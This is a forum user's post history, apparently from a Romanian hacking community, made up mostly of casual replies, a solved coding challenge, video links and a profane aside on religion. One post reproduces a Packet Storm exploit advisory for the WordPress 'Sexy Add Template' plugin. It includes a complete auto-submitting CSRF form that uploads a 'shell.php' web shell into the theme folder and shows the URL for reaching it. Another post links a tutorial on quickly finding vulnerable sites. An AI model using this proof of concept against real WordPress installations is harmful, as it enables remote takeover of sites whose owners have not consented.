-
Posts
457 -
Joined
-
Last visited
Everything posted by StoNe-
-
Raspunsurile prin PM! Premiu: +1 respect. Solvers: - Sweby - TheTime - akkiliON - denjacker - Cor3Quad - Gecko - DarkyAngel - xTremeSurfer - StrXt Challenge closed. Congrats to all solvers!
-
De-al nostru? Iar noi ai cui suntem? ON: Bine ai venit!
-
Din câte ?tiu, se poate modfiica ?i titlul din edit, dar, s? nu fiu r?u, bine ai venit!
-
Fi?ierele trebuie urcate în public_html. Google e prietenul t?u. Cum se pun întreb?ri în mod inteligent - Wiki.lug.ro
-
Tu intri pe site accesând ftp:// ? http:// , nigga! Sau nu am în?eles eu întrebarea..
-
Biting Elbows - 'Bad Motherfucker' (Insane Office Escape 2) on Vimeo
-
[COLOR="#FF0000"]1.[/COLOR] 2 + 2 + 2 = 6 [COLOR="#FF0000"]2.[/COLOR] Lui b i se scade cate o valoare la fiecare loop, deci de 4 ori textul RST [COLOR="#FF0000"]3.[/COLOR] Eroare ( <% %> ) [COLOR="#FF0000"]4.[/COLOR] Eroare ( ; ) [COLOR="#FF0000"]5.[/COLOR] TSR ( ai si conditia 'else', deci prima este incorecta, se va afisa asta ) [COLOR="#FF0000"]6.[/COLOR] Acum este ora 4 noaptea!Sa fac un challenge pe RST [COLOR="#FF0000"]7.[/COLOR] 10 [COLOR="#FF0000"]8.[/COLOR] #define injection ( just that, nu sunt sigur )
-
Mi se pare, sau într-adev?r „seam?n?”? Btw, welcome!
-
Same here: Encrypt: $},>_%> (pulamea) Decrypt: dulamea
-
http://www.youtube.com/watch?v=LfS93CX-Kk8&list=PL_dcUTU9sa6kyKnOO1RUcvQlpMrG1zv_m&index=4
-
Cum sa gasesti un site vulnerabil foarte repede
StoNe- replied to FiliBlox's topic in Tutoriale in romana
Nu era mai ok sa faci un „tutorial” despre dorkuri ?i magia google decât s? postezi asta? -
http://www.youtube.com/watch?v=z6TIsGNrKIA
-
Copy+paste?
-
Eu cred în Dumnezeu ?i credin?a s-a înt?rit prin mai multe „evenimente” din trecut, dar asta nu prea conteaz?. În trecut, a?a zisele r?zboaie în numele lui Dumnezeu, au fost doar ni?te manipul?ri în mas?... ca s? moar? pro?tii pentru ?ia cu ceva cerebel ?i cum se întâmpl? ?i azi... ?i de sus s? ajung? ?i mai sus, iar cei cu pu?in s? ajung?-n pula goal?. Nu prea cred în biseric?( m? refer la astea ap?rute de unu, dou? decenii încoace ), sunt multe construite pe principiul „Bag?-ne euroi în cont, iar Dumnezeu te iart?”.
-
O prostie... singurul lucru care îl fac este s?-l felicit pe autorul site-ului hsmaker.com
-
Mul?umesc. Chiar aveam nevoie. @hintui?tii: V-a dat destule informa?ii - este criptat de 2 ori.
-
WordPress Sexy Add Template third party plugin suffers from a cross site request forgery vulnerability that can allow for a remote shell upload. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ./Title Exploit : Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability ./Link Download : http://wordpress.org/extend/plugins/sexy-add-template/ ./Author Exploit: [ TheCyberNuxbie ] [ root@31337sec.com ] [ nux_exploit ] ./Security Risk : [ Critical Level ] ./Category XPL : [ WebApps/ZeroDay ] ./Tested On : Mozilla Firefox + Xampp + Windows 7 Ultimate x32 ID ./Time & Date : September, 22 2012. 10:27 AM. Jakarta, Indonesia. +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ||| -=[ Use It At Your Risk ]=- ||| ||| This Was Written For Educational Purpos Only ||| ||| Author Will Be Not Responsible For Any Damage ||| xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ################################################################################# # # [ Information Details ] # - Wordpress Plugin Sexy Add Template: # Attacker allow CSRF Upload Shell. # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce". # # <html> # <head> # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title> # </head> # <body onload="document.form0.submit();"> # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" > # <input type="hidden" name="newfile" value="yes" /> # <input type="hidden" type="text" value="shell.php" name="AM_filename"> # <textarea type="hidden" name="AM_file_content"> # [ Your Script Backdoor/Shell ] # </textarea> # </form> # </body> # </html> # # - Access Shell: # http://localhost/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!! # # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # # - Special Thanks: # ...:::' 1337day - Inj3ct0r TEAM ':::... # BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,, # , And All Inj3ct0r Fans & All Hacktivist,,, Source: WordPress Sexy Add Template CSRF Shell Upload ? Packet Storm